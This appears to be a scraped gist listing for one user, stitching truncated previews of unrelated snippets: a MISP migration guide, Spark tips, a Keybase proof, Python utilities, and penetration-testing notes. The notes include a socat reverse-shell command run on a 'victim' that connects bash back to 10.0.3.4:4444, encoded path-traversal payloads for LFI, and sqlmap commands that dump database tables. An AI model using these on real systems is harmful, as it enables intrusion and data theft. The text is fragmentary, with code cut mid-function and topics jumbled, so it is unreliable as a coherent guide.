Kory Kyzar korrosivesec

Migration guide to new Background Jobs backend

As of MISP version 2.4.151 we introduced a simpler way to handle background jobs without relying in CakeResque as this library is no longer mantained.

For the time being both background jobs backends will be supported, but we plan to phase out the CakeResque one in a near future.

The new backend requires Supervisor and some extra PHP packages.

This guide is intended for Ubuntu/Debian systems

Install requirements

Spark Tips & Tricks

Misc. Tips & Tricks

If values are integers in [0, 255], Parquet will automatically compress to use 1 byte unsigned integers, thus decreasing the size of saved DataFrame by a factor of 8.
Partition DataFrames to have evenly-distributed, ~128MB partition sizes (empirical finding). Always err on the higher side w.r.t. number of partitions.
Pay particular attention to the number of partitions when using flatMap, especially if the following operation will result in high memory usage. The flatMap op usually results in a DataFrame with a [much] larger number of rows, yet the number of partitions will remain the same. Thus, if a subsequent op causes a large expansion of memory usage (i.e. converting a DataFrame of indices to a DataFrame of large Vectors), the memory usage per partition may become too high. In this case, it is beneficial to repartition the output of flatMap to a number of partitions that will safely allow for appropriate partition memory sizes, based upon the

Upgrade shell to full TTY

On Kali (listen):

socat file:tty,raw,echo=0 tcp-listen:4444

On Victim (launch):

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444

Keybase proof

I hereby claim:

I am korrosivesec on github.
I am k2 (https://keybase.io/k2) on keybase.
I have a public key ASBEgloMXk759GmTUdrF16DkSvZGtHg42fqXFs6woYu64wo

To claim this, I am signing this object:

	import aiohttp
	import asyncio
	from typing import Text, Awaitable, Tuple
	from cryptography import x509
	from cryptography.x509 import Certificate
	from cryptography.hazmat.primitives import hashes

	# Additional fields to parse documented at https://cryptography.io/en/latest/x509/reference/#x-509-certificate-object
	def parse_cert(cert: Certificate) -> dict:
	cert_dict = {}

	Wordlist == /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt

	Traversal encoding:
	===================
	../
	..\
	..\/
	%2e%2e%2f
	%252e%252e%252f
	%c0%ae%c0%ae%c0%af

	# Enumerate databases
	sqlmap --dbms=mysql -u "$URL" --dbs

	# Enumerate tables
	sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --tables

	# Dump table data
	sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" -T "$TABLE" --dump

	# Specify parameter to exploit

	# Byte-compiled / optimized / DLL files
	__pycache__/
	*.py[cod]
	*$py.class

	# C extensions
	*.so

	# Distribution / packaging
	.Python

	import logging
	import os

	LOGGER_NAME = 'my_logger'

	def init_logger(log_level_for_console: str = 'info', log_level_for_file: str = 'debug',
	save_dir: str = None):
	logger = logging.getLogger(LOGGER_NAME)
	logger.setLevel(level=logging.DEBUG)
	logger.propagate = False

	#!/usr/bin/env python
	# -- mode: python; coding: utf-8 --
	import sys
	import os.path
	import smtplib

	if len(sys.argv) <= 2:
	print('Usage:')
	print(' $ python ' + sys.argv[0] + ' mailfrom rcptto <emlfile>')
	print('')